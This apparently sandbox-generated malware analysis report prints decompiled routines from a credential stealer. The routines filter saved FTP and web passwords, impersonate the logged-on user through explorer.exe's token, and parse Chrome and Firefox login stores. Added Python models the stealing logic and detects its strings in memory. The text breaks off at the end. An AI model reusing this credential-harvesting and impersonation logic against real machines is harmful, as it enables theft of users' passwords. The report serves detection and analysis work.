                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpi$ByteCharFreeMultiTaskWide
                                                                                                                                        • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                                                                                                                                        • API String ID: 636431001-4287852900
                                                                                                                                        • Opcode ID: f65fd73147f5aca0a46af2319b02ed65869736b7c56365dc2e62a4b937746f16
                                                                                                                                        • Instruction ID: aa4ee62190c4d2ee97cf88f99713530f27591a1cf00d227c7f36b9cc53f8f228
                                                                                                                                        • Opcode Fuzzy Hash: f65fd73147f5aca0a46af2319b02ed65869736b7c56365dc2e62a4b937746f16
                                                                                                                                        • Instruction Fuzzy Hash: 0E41487590021DABFF21DF90CD41FDA7B7AFB06380F004291BA0865196DB719AD4DF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                        			E10002CCA(signed int __eax, signed int __edx, intOrPtr _a3, void* _a4) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				void* _v12;
                                                                                                                                        				void* _v16;
                                                                                                                                        				void* _v276;
                                                                                                                                        				void* _v304;
                                                                                                                                        				void* _v312;
                                                                                                                                        				void* _v316;
                                                                                                                                        				void* _v320;
                                                                                                                                        				void* _v324;
                                                                                                                                        				signed int _t34;
                                                                                                                                        				void* _t36;
                                                                                                                                        				signed int _t39;
                                                                                                                                        				signed int _t40;
                                                                                                                                        
                                                                                                                                        				_push(_t36);
                                                                                                                                        				_t39 = __edx ^ __eax;
                                                                                                                                        				_t34 = __eax ^ _t39;
                                                                                                                                        				_t40 = _t39 ^ _t34;
                                                                                                                                        				_push(0x10002ce7);
                                                                                                                                        				asm("clc");
                                                                                                                                        				if(_t40 < 0) {
                                                                                                                                        					_t1 = _t36 + 0xf4983d;
                                                                                                                                        					 *_t1 =  *((char*)(_t36 + 0xf4983d)) + 1;
                                                                                                                                        					asm("adc [eax], al");
                                                                                                                                        					if( *_t1 == 0 ||  *0x1000f49c == 0 ||  *0x1000f4d4 == 0) {
                                                                                                                                        						return 0;
                                                                                                                                        					} else {
                                                                                                                                        						_a3 = _a3 + _t40;
                                                                                                                                        					}
                                                                                                                                        				} else {
                                                                                                                                        					return _t34;
                                                                                                                                        				}
                                                                                                                                        			}

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: explorer.exe
                                                                                                                                        • API String ID: 0-3187896405
                                                                                                                                        • Opcode ID: aae1b6f692b7d5d64feb95fb9a0548ed15fbc17016c41bbad873ed9869b645cf
                                                                                                                                        • Instruction ID: ff7abe58b84ce967abbcf31081a5852efd773401714cfb915e4d7bfdf69332b0
                                                                                                                                        • Opcode Fuzzy Hash: aae1b6f692b7d5d64feb95fb9a0548ed15fbc17016c41bbad873ed9869b645cf
                                                                                                                                        • Instruction Fuzzy Hash: 87316232A402589BFB61DF60CC85BEEB7F5EB043C4F1040A5E615E50A9DB749E94DF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E100095B3(void* __eax, void* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                        				int _v8;
                                                                                                                                        				char _v12;
                                                                                                                                        				char _v16;
                                                                                                                                        				int _v20;
                                                                                                                                        				char _v24;
                                                                                                                                        				char _v28;
                                                                                                                                        				int _v32;
                                                                                                                                        				char _v36;
                                                                                                                                        				char _v40;
                                                                                                                                        				char* _v44;
                                                                                                                                        				int _v48;
                                                                                                                                        				int _v52;
                                                                                                                                        				intOrPtr _t49;
                                                                                                                                        				int _t62;
                                                                                                                                        				int _t76;
                                                                                                                                        				void* _t79;
                                                                                                                                        
                                                                                                                                        				_t79 = __ecx;
                                                                                                                                        				if(_a16 != 0) {
                                                                                                                                        					_t49 = _a16;
                                                                                                                                        					__eflags =  *0x10012e98 - _t49; // 0x0
                                                                                                                                        					if(__eflags < 0) {
                                                                                                                                        						__eflags =  *0x10012e9c - _t49; // 0x0
                                                                                                                                        						if(__eflags < 0) {
                                                                                                                                        							__eflags =  *0x10012ea0 - _t49; // 0x0
                                                                                                                                        							if(__eflags < 0) {
                                                                                                                                        								E10008860(_a12,  *0x10012e98,  &_v8,  &_v12,  &_v16);
                                                                                                                                        								E10008860(_a12,  *0x10012ea0,  &_v20,  &_v24,  &_v28);
                                                                                                                                        								_t49 = E10008860(_a12,  *0x10012e9c,  &_v32,  &_v36,  &_v40);
                                                                                                                                        								__eflags = _v8;
                                                                                                                                        								if(_v8 != 0) {
                                                                                                                                        									__eflags = _v32;
                                                                                                                                        									if(_v32 != 0) {
                                                                                                                                        										_v44 = E10001888(_v8 + 1);
                                                                                                                                        										_t62 = E100018BF(_v16, _v44, _v8);
                                                                                                                                        										_v48 = 0;
                                                                                                                                        										_v52 = 0;
                                                                                                                                        										__eflags =  *0x10010155;
                                                                                                                                        										if( *0x10010155 != 0) {
                                                                                                                                        											__eflags =  *0x10010155 - 1;
                                                                                                                                        											if( *0x10010155 != 1) {
                                                                                                                                        												__eflags =  *0x10010155 - 2;
                                                                                                                                        												if( *0x10010155 == 2) {
                                                                                                                                        													_t62 = 0;
                                                                                                                                        													__eflags = 0;
                                                                                                                                        												}
                                                                                                                                        											} else {
                                                                                                                                        												_t62 = StrCmpNIA(_v44, "ftp.", lstrlenA("ftp."));
                                                                                                                                        											}
                                                                                                                                        											goto L17;
                                                                                                                                        										} else {
                                                                                                                                        											_t76 = StrCmpNIA(_v44, "ftp://", lstrlenA("ftp://"));
                                                                                                                                        											__eflags = _t76;
                                                                                                                                        											if(_t76 != 0) {
                                                                                                                                        												_t76 = StrCmpNIA(_v44, "http://", lstrlenA("http://"));
                                                                                                                                        											}
                                                                                                                                        											_t62 = _t76;
                                                                                                                                        											__eflags = _t62;
                                                                                                                                        											if(_t62 != 0) {
                                                                                                                                        												_t62 = StrCmpNIA(_v44, "https://", lstrlenA("https://"));
                                                                                                                                        											}
                                                                                                                                        											L17:
                                                                                                                                        											__eflags = _t62;
                                                                                                                                        											if(_t62 == 0) {
                                                                                                                                        												__eflags = _v20;
                                                                                                                                        												if(_v20 != 0) {
                                                                                                                                        													_v48 = E10006BEC(_t79, _v28, _v20);
                                                                                                                                        												}
                                                                                                                                        												_v52 = E10006BEC(_t79, _v40, _v32);
                                                                                                                                        												__eflags = _v44;
                                                                                                                                        												if(_v44 != 0) {
                                                                                                                                        													__eflags = _v52;
                                                                                                                                        													if(_v52 != 0) {
                                                                                                                                        														E10001522(_a8, _a20);
                                                                                                                                        														E10001584(_a8, _v44);
                                                                                                                                        														E10001584(_a8, _v48);
                                                                                                                                        														E10001584(_a8, _v52);
                                                                                                                                        													}
                                                                                                                                        												}
                                                                                                                                        											}
                                                                                                                                        											E10001871(_v48);
                                                                                                                                        											E10001871(_v52);
                                                                                                                                        											return E10001871(_v44);
                                                                                                                                        										}
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					return _t49;
                                                                                                                                        				} else {
                                                                                                                                        					return __eax;
                                                                                                                                        				}
			}

Instruction address range for this function: 0x100095b3 .. 0x10009775

                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(ftp://,?,?,00000000,00000001), ref: 10009683
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 10009691
                                                                                                                                        • lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 1000969F
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 100096AD
                                                                                                                                        • lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 100096BB
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 100096C9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen
                                                                                                                                        • String ID: ftp.$ftp://$http://$https://
                                                                                                                                        • API String ID: 1659193697-2878239594
                                                                                                                                        • Opcode ID: 9fa96e3b8e1d8b797c2f5cbf07c57b8949626af6cba1b7897d13e5867c4a8527
                                                                                                                                        • Instruction ID: 1ff1fc447f0b7785abd9fd59a0dd95ebbbdf624f50d86c182452470306d3a48f
                                                                                                                                        • Opcode Fuzzy Hash: 9fa96e3b8e1d8b797c2f5cbf07c57b8949626af6cba1b7897d13e5867c4a8527
                                                                                                                                        • Instruction Fuzzy Hash: 4A41FA76914109EEEF02DFA0DC45AEE7BB9FB08384F108121F515B5069DB729AA0DB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%
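The routine above is the stealer's filter for stored credential entries: depending on a global mode byte at 0x10010155 it keeps only entries whose host begins with a URL scheme (mode 0), with "ftp." (mode 1), or every entry (mode 2), then decodes the user and password and appends tag, host, user and password to an output buffer. Note that StrCmpNIA returns 0 on a match, so `_t62 == 0` at L17 means "accepted". The following Python is an added model of that acceptance logic and of the explorer.exe selection loop in E10002E29 below; it is not code from the sample or from the report. The function names, the sample entries and process table are constructed for illustration, and two points are inferences rather than facts shown on the page: the function pointer at 0x1000f49c is assumed to be ProcessIdToSessionId, and mode values other than 0, 1 and 2 are assumed to reject the entry (the listing leaves `_t62` holding the return value of E100018BF in that case).

```python
"""Model of the Pony-style credential filter and explorer.exe selection.

Added example, not code from the sample or the sandbox report.  All names
and the sample data below are constructed for illustration.
"""

FTP_SCHEME = "ftp://"
HTTP_SCHEME = "http://"
HTTPS_SCHEME = "https://"


def str_cmp_n_ia(s: str, prefix: str) -> int:
    """Model of SHLWAPI StrCmpNIA(s, prefix, lstrlenA(prefix)):
    returns 0 when the first len(prefix) characters match case-insensitively,
    non-zero otherwise (the sign of the real return value is irrelevant here)."""
    return 0 if s[: len(prefix)].lower() == prefix.lower() else 1


def accepts_entry(mode: int, host: str) -> bool:
    """Mirror the branch on the global byte at 0x10010155.

    mode 0: host must begin with ftp://, http:// or https://
    mode 1: host must begin with "ftp." (bare-hostname form)
    mode 2: every entry is accepted (_t62 is forced to 0)
    other:  assumption: rejected (the listing does not show the value
            E100018BF leaves in _t62, so this branch is a guess)
    """
    if mode == 0:
        r = str_cmp_n_ia(host, FTP_SCHEME)
        if r != 0:
            r = str_cmp_n_ia(host, HTTP_SCHEME)
        if r != 0:
            r = str_cmp_n_ia(host, HTTPS_SCHEME)
        return r == 0
    if mode == 1:
        return str_cmp_n_ia(host, "ftp.") == 0
    if mode == 2:
        return True
    return False


# Constructed credential-store entries (not recovered from the sample).
SAMPLE_ENTRIES = [
    {"host": "ftp://files.example.test", "user": "alice", "password": "s3cret"},
    {"host": "ftp.example.test", "user": "bob", "password": "hunter2"},
    {"host": "HTTPS://portal.example.test", "user": None, "password": "p@ss"},
    {"host": "http://noauth.example.test", "user": "carol", "password": None},
]


def harvest(mode: int, entries, tag: str = "constructed"):
    """Return the (tag, host, user, password) tuples the routine would emit.

    The user field (_v48) is only decoded when a username exists (_v20 != 0);
    the record is written only when host (_v44) and the decoded password
    (_v52) are both non-null, so entries without a password are dropped
    while entries without a username are kept with an empty user."""
    records = []
    for e in entries:
        if not accepts_entry(mode, e["host"]):
            continue
        user = e["user"] or ""
        if e["host"] and e["password"]:
            records.append((tag, e["host"], user, e["password"]))
    return records


# Constructed process snapshot: (pid, image name, session id).
SAMPLE_PROCESSES = [
    (4, "System", 0),
    (812, "svchost.exe", 0),
    (1520, "explorer.exe", 1),
    (2204, "Explorer.EXE", 2),
    (3300, "notepad.exe", 1),
]


def pick_explorer_pid(processes, target_session: int):
    """Model of the selection loop in E10002E29: walk the snapshot and return
    the first pid whose image name contains "explorer.exe" (StrStrIA is a
    case-insensitive substring search) and whose session id equals the
    caller's target session.  Assumption: the call through 0x1000f49c is
    ProcessIdToSessionId.  Returns None when nothing matches."""
    for pid, name, session in processes:
        if "explorer.exe" not in name.lower():
            continue
        if session != target_session:
            continue
        return pid
    return None


if __name__ == "__main__":
    for mode in (0, 1, 2):
        print(mode, harvest(mode, SAMPLE_ENTRIES))
    print(pick_explorer_pid(SAMPLE_PROCESSES, 2))
```

The explorer.exe lookup matters because the loader runs inside svchost.exe (session 0); taking the token of the interactive user's explorer.exe and calling ImpersonateLoggedOnUser lets the stealer read that user's HKCU hive and profile. The constants in the listing decode as follows: OpenProcess is called with 0x2000000 (MAXIMUM_ALLOWED), OpenProcessToken with 0x201eb (READ_CONTROL | TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID), and the registry call with 0xf003f (KEY_ALL_ACCESS). Sysmon Event ID 10 (ProcessAccess) with a source of svchost.exe and a target of explorer.exe is the place to look for this behaviour on a host.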

                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                        			E10002E29(void* __ebx) {
                                                                                                                                        				int _t25;
                                                                                                                                        				void* _t33;
                                                                                                                                        				void* _t36;
                                                                                                                                        				void* _t45;
                                                                                                                                        				void* _t49;
                                                                                                                                        				int _t51;
                                                                                                                                        				void* _t52;
                                                                                                                                        
                                                                                                                                        				_t49 = __ebx;
                                                                                                                                        				while(1) {
                                                                                                                                        					L15:
                                                                                                                                        					while(1) {
                                                                                                                                        						L17:
                                                                                                                                        						_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
                                                                                                                                        						L1:
                                                                                                                                        						if(_t25 != 0) {
                                                                                                                                        							L2:
                                                                                                                                        							if(StrStrIA(_t52 - 0x110, "explorer.exe") == 0) {
                                                                                                                                        								L17:
                                                                                                                                        								_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
                                                                                                                                        								goto L1;
                                                                                                                                        							} else {
                                                                                                                                        								L3:
                                                                                                                                        								 *(_t52 - 0x13c) = 0;
                                                                                                                                        								_t33 =  *0x1000f49c( *(_t52 - 0x12c), _t52 - 0x13c);
                                                                                                                                        								_t51 =  *(_t52 - 0x13c);
                                                                                                                                        								if(_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc))) {
                                                                                                                                        									continue;
                                                                                                                                        								} else {
                                                                                                                                        									L5:
                                                                                                                                        									_t36 = OpenProcess(0x2000000, 0,  *(_t52 - 0x12c));
                                                                                                                                        									if(_t36 == 0) {
                                                                                                                                        										continue;
                                                                                                                                        									} else {
                                                                                                                                        										L6:
                                                                                                                                        										 *(_t52 - 8) = _t36;
                                                                                                                                        										if(OpenProcessToken( *(_t52 - 8), 0x201eb, _t52 - 4) == 0) {
                                                                                                                                        											CloseHandle( *(_t52 - 8));
                                                                                                                                        											continue;
                                                                                                                                        											do {
                                                                                                                                        												do {
                                                                                                                                        													do {
                                                                                                                                        														goto L17;
                                                                                                                                        													} while (StrStrIA(_t52 - 0x110, "explorer.exe") == 0);
                                                                                                                                        													goto L3;
                                                                                                                                        												} while (_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc)));
                                                                                                                                        												goto L5;
                                                                                                                                        											} while (_t36 == 0);
                                                                                                                                        											goto L6;
                                                                                                                                        										} else {
                                                                                                                                        											if(ImpersonateLoggedOnUser( *(_t52 - 4)) == 0) {
                                                                                                                                        												CloseHandle( *(_t52 - 4));
                                                                                                                                        												CloseHandle( *(_t52 - 8));
                                                                                                                                        												goto L15;
                                                                                                                                        											} else {
                                                                                                                                        												_t49 = _t49 + 1;
                                                                                                                                        												 *(_t52 - 0x140) = 0;
                                                                                                                                        												_t45 = _t52 - 0x140;
                                                                                                                                        												_push(_t45);
                                                                                                                                        												_push(0xf003f);
                                                                                                                                        												L1000BAD0();
                                                                                                                                        												if(_t45 == 0 &&  *(_t52 - 0x140) != 0) {
                                                                                                                                        													 *0x1000f159 =  *(_t52 - 0x140);
                                                                                                                                        												}
                                                                                                                                        												if( *((intOrPtr*)(_t52 + 8)) != 0) {
                                                                                                                                        													 *__eax =  *(_t52 - 4);
                                                                                                                                        												}
                                                                                                                                        											}
                                                                                                                                        										}
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        						CloseHandle( *(_t52 - 0x138));
                                                                                                                                        						return _t49;
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • StrStrIA.SHLWAPI(?,explorer.exe), ref: 10002D65
                                                                                                                                        • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,00000128,?,explorer.exe), ref: 10002D89
                                                                                                                                        • OpenProcess.KERNEL32(02000000,00000000,?), ref: 10002DB3
                                                                                                                                        • OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 10002DCF
                                                                                                                                        • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 10002DDC
                                                                                                                                        • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 10002DFD
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 10002E2E
                                                                                                                                        • CloseHandle.KERNEL32(?,?), ref: 10002E36
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 10002E40
                                                                                                                                        • Process32Next.KERNEL32 ref: 10002E52
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 10002E62
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
                                                                                                                                        • String ID: explorer.exe
                                                                                                                                        • API String ID: 3144406365-3187896405
                                                                                                                                        • Opcode ID: b031d7eb600dd4d3a026a6c6892b47645c1526bacc70020c88217b2f7b9af005
                                                                                                                                        • Instruction ID: efb129f0f8724635ee390654e884786d24d33efd99524f12bb8733396b9faff8
                                                                                                                                        • Opcode Fuzzy Hash: b031d7eb600dd4d3a026a6c6892b47645c1526bacc70020c88217b2f7b9af005
                                                                                                                                        • Instruction Fuzzy Hash: 30212932A40558EBEF62DF50CC46BEEBBB4EB083C4F1040A5E619A5069DB309F94EF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 67%
                                                                                                                                        			E10009028(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                        				char* _t14;
                                                                                                                                        				int _t17;
                                                                                                                                        				int _t20;
                                                                                                                                        				CHAR* _t29;
                                                                                                                                        
                                                                                                                                        				E100028D7(_a4);
                                                                                                                                        				_t14 = StrStrIA(_a4, 0x100104d2);
                                                                                                                                        				if(_t14 != 0) {
                                                                                                                                        					 *_t14 = 0;
                                                                                                                                        					E100028D7(_a4);
                                                                                                                                        					_t29 = "CONSTRAINT";
                                                                                                                                        					while(1) {
                                                                                                                                        						_t17 = lstrcmpiA(_t29, _a4);
                                                                                                                                        						if(_t17 == 0) {
                                                                                                                                        							break;
                                                                                                                                        						}
                                                                                                                                        						asm("cld");
                                                                                                                                        						asm("repne scasb");
                                                                                                                                        						if( *_t29 != 0) {
                                                                                                                                        							continue;
                                                                                                                                        						} else {
                                                                                                                                        							_t20 = lstrlenA(_a4);
                                                                                                                                        							if(_t20 != 0) {
                                                                                                                                        								if(lstrcmpiA(_a4, "origin_url") == 0) {
                                                                                                                                        									_push(_a8);
                                                                                                                                        									_pop( *0x10012e8c);
                                                                                                                                        								}
                                                                                                                                        								if(lstrcmpiA(_a4, "password_value") == 0) {
                                                                                                                                        									_push(_a8);
                                                                                                                                        									_pop( *0x10012e90);
                                                                                                                                        								}
                                                                                                                                        								if(lstrcmpiA(_a4, "username_value") == 0) {
                                                                                                                                        									_push(_a8);
                                                                                                                                        									_pop( *0x10012e94);
                                                                                                                                        								}
                                                                                                                                        								return 1;
                                                                                                                                        							} else {
                                                                                                                                        								return _t20;
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        						goto L15;
                                                                                                                                        					}
                                                                                                                                        					return _t17;
                                                                                                                                        				} else {
                                                                                                                                        					return _t14;
                                                                                                                                        				}
                                                                                                                                        				L15:
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 100028D7: lstrlenA.KERNEL32(?), ref: 1000290B
                                                                                                                                        • StrStrIA.SHLWAPI(?,100104D2), ref: 1000903C
                                                                                                                                        • lstrcmpiA.KERNEL32(CONSTRAINT,?,?,100104D2), ref: 1000905E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpilstrlen
                                                                                                                                        • String ID: CONSTRAINT$origin_url$password_value$username_value
                                                                                                                                        • API String ID: 3649823140-2401479949
                                                                                                                                        • Opcode ID: dcacee77fdbfdbfb3d9820e5557edd114650b59a69890f83824c37d2690222b5
                                                                                                                                        • Instruction ID: e8bd7cd31ca1c7768776c91f8ef3d9532c1af92d831bb6c34eb1698525fece6d
                                                                                                                                        • Opcode Fuzzy Hash: dcacee77fdbfdbfb3d9820e5557edd114650b59a69890f83824c37d2690222b5
                                                                                                                                        • Instruction Fuzzy Hash: E611C27B200845BAEF11DF24DC0298D3FD1EB613E8B00C021FA55A816AE775D9A1CB40
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%

C-Code - Quality: 67%
	/* Key/value consumer for a harvested credential store: _a4 is the key
	   string, _a8 its value. The key is only processed when it contains the
	   string at 0x100104D2 (not shown in this listing); it is truncated at
	   that match and compared against a stop list whose first entry is
	   "CONSTRAINT". The stop list is a table of NUL-separated strings that the
	   loop walks with repne scasb until an empty string (double NUL) ends it;
	   a key found in the table makes the function return 0. A key that
	   survives is matched against the Firefox login-store field names
	   hostname, encryptedPassword and encryptedUsername, and the value pointer
	   is saved in one of three globals. The previous function in this listing
	   does the same for Chrome's Login Data columns origin_url, password_value
	   and username_value (see its String ID above). */
	E100094F8(CHAR* _a4, intOrPtr _a8) {
		char* _t14;
		int _t17;
		int _t20;
		CHAR* _t29;

		E100028D7(_a4);                       /* helper; calls lstrlenA per the API list */
		_t14 = StrStrIA(_a4, 0x100104d2);     /* case-insensitive search for the unnamed string */
		if(_t14 != 0) {
			 *_t14 = 0;                       /* cut the key at the match */
			E100028D7(_a4);
			_t29 = "CONSTRAINT";              /* first entry of the packed stop list */
			while(1) {
				_t17 = lstrcmpiA(_t29, _a4);
				if(_t17 == 0) {
					break;                    /* key is in the stop list: returns 0 */
				}
				asm("cld");
				asm("repne scasb");           /* advance _t29 past the current NUL-terminated entry */
				if( *_t29 != 0) {
					continue;                 /* next entry */
				} else {
					_t20 = lstrlenA(_a4);     /* empty entry: end of the stop list */
					if(_t20 != 0) {
						if(lstrcmpiA(_a4, "hostname") == 0) {
							_push(_a8);
							_pop( *0x10012e98);     /* global: hostname value */
						}
						if(lstrcmpiA(_a4, "encryptedPassword") == 0) {
							_push(_a8);
							_pop( *0x10012e9c);     /* global: encryptedPassword value */
						}
						if(lstrcmpiA(_a4, "encryptedUsername") == 0) {
							_push(_a8);
							_pop( *0x10012ea0);     /* global: encryptedUsername value */
						}
						return 1;
					} else {
						return _t20;          /* empty key: returns 0 */
					}
				}
				goto L15;                     /* unreachable; decompiler artifact */
			}
			return _t17;
		} else {
			return _t14;                      /* separator string absent: returns 0 */
		}
		L15:
	}







Instruction addresses for E100094F8, one per decompiled line above (0x00000000 marks a line with no mapped instruction): 0x100094ff to 0x100095b0.

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 100028D7: lstrlenA.KERNEL32(?), ref: 1000290B
                                                                                                                                        • StrStrIA.SHLWAPI(?,100104D2), ref: 1000950C
                                                                                                                                        • lstrcmpiA.KERNEL32(CONSTRAINT,?,?,100104D2), ref: 1000952E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpilstrlen
                                                                                                                                        • String ID: CONSTRAINT$encryptedPassword$encryptedUsername$hostname
                                                                                                                                        • API String ID: 3649823140-2971371156
                                                                                                                                        • Opcode ID: 9c606bf107ad5038e13c0e28fbdcb92a610125df13c33924d652742d75be40eb
                                                                                                                                        • Instruction ID: e1ee14eae353d50deec925214afc51d8cd1ac08dabf7b11ce923d922b8966a22
                                                                                                                                        • Opcode Fuzzy Hash: 9c606bf107ad5038e13c0e28fbdcb92a610125df13c33924d652742d75be40eb
                                                                                                                                        • Instruction Fuzzy Hash: CC11E97B200845BAEF02DF25DC01D8D7FD1EB612E8B00C021FA58A917AE775DAA1DB40
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%
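The two credential parsers above are recognisable in a memory dump by their string tables alone: Chrome's Login Data columns (origin_url, username_value, password_value) in the earlier function and Firefox's logins.json keys (hostname, encryptedUsername, encryptedPassword) in E100094F8, each set sitting next to a packed stop list that begins with "CONSTRAINT". The following triage script is an added example written for this report; it is neither Joe Sandbox code nor code from the sample. It flags a store only when its complete field set occurs within a window (4 KiB is an assumed default, not a value from the report), reads the NUL-separated stop list the way the repne scasb loop does, and runs on a constructed sample dump rather than on the report's memory image.

```python
"""Memory-dump triage for browser credential-store string clusters.

Added example for this report; it is not Joe Sandbox code and not code from
the sample. The field-name sets come from the String IDs of the two
decompiled functions above: Chrome's Login Data columns (origin_url,
username_value, password_value) and Firefox's logins.json keys (hostname,
encryptedUsername, encryptedPassword). All names of one set close together in
an unpacked region is a cheap indicator of a resident stealer module; a lone
"hostname" is too common to act on. The window size and the sample dump are
constructed assumptions, not values taken from the report.
"""
import re
from typing import Dict, List

# Field names per credential store, as listed in the report's String IDs.
CREDENTIAL_FIELD_SETS: Dict[str, List[bytes]] = {
    "chrome_login_data": [b"origin_url", b"username_value", b"password_value"],
    "firefox_logins": [b"hostname", b"encryptedUsername", b"encryptedPassword"],
}

# Assumption: an unpacked module keeps its string table within a few KiB.
DEFAULT_WINDOW = 4096


def _token_offsets(buf: bytes, needle: bytes) -> List[int]:
    """Offsets of needle in buf where it is a whole token (not part of a longer
    identifier such as b"hostnames" or b"encryptedPasswordX")."""
    pattern = re.compile(rb"(?<![A-Za-z0-9_])" + re.escape(needle) + rb"(?![A-Za-z0-9_])")
    return [m.start() for m in pattern.finditer(buf)]


def find_credential_field_clusters(buf: bytes, window: int = DEFAULT_WINDOW) -> Dict[str, int]:
    """Return {store: offset} for every store whose complete field set occurs
    within `window` bytes of one occurrence of its first field; the offset is
    the lowest offset in the cluster."""
    hits: Dict[str, int] = {}
    for store, fields in CREDENTIAL_FIELD_SETS.items():
        positions = [_token_offsets(buf, f) for f in fields]
        if any(not p for p in positions):
            continue  # some field never occurs at all
        for anchor in positions[0]:
            chosen = [anchor]
            for offs in positions[1:]:
                near = [o for o in offs if abs(o - anchor) < window]
                if not near:
                    break
                chosen.append(min(near, key=lambda o: abs(o - anchor)))
            else:
                hits[store] = min(chosen)
                break
    return hits


def walk_packed_string_list(buf: bytes, start: int) -> List[bytes]:
    """Read NUL-separated strings from buf at `start` until an empty string
    (double NUL) ends the table, the layout the "CONSTRAINT" loop in
    E100094F8 walks with repne scasb."""
    items: List[bytes] = []
    pos = start
    while pos < len(buf):
        end = buf.find(b"\x00", pos)
        if end == -1:
            end = len(buf)
        item = buf[pos:end]
        if not item:
            break
        items.append(item)
        pos = end + 1
    return items


# Constructed sample dump (not from the report): a short stop list, the Firefox
# field names packed together, then the Chrome names spread over ~8 KiB, and
# finally a bare English "hostname" that must not count as a cluster on its own.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"CONSTRAINT\x00KEY\x00\x00"
    + b"hostname\x00encryptedPassword\x00encryptedUsername\x00"
    + b"\x00" * 300
    + b"origin_url\x00" + b"\x00" * 8000 + b"password_value\x00username_value\x00"
    + b"the hostname of the server\x00"
)


def triage(buf: bytes = SAMPLE_DUMP) -> Dict[str, int]:
    """Clusters found with the default window; the Chrome names in the sample
    are too far apart for it, the Firefox names are not."""
    return find_credential_field_clusters(buf)


if __name__ == "__main__":
    for store, off in triage().items():
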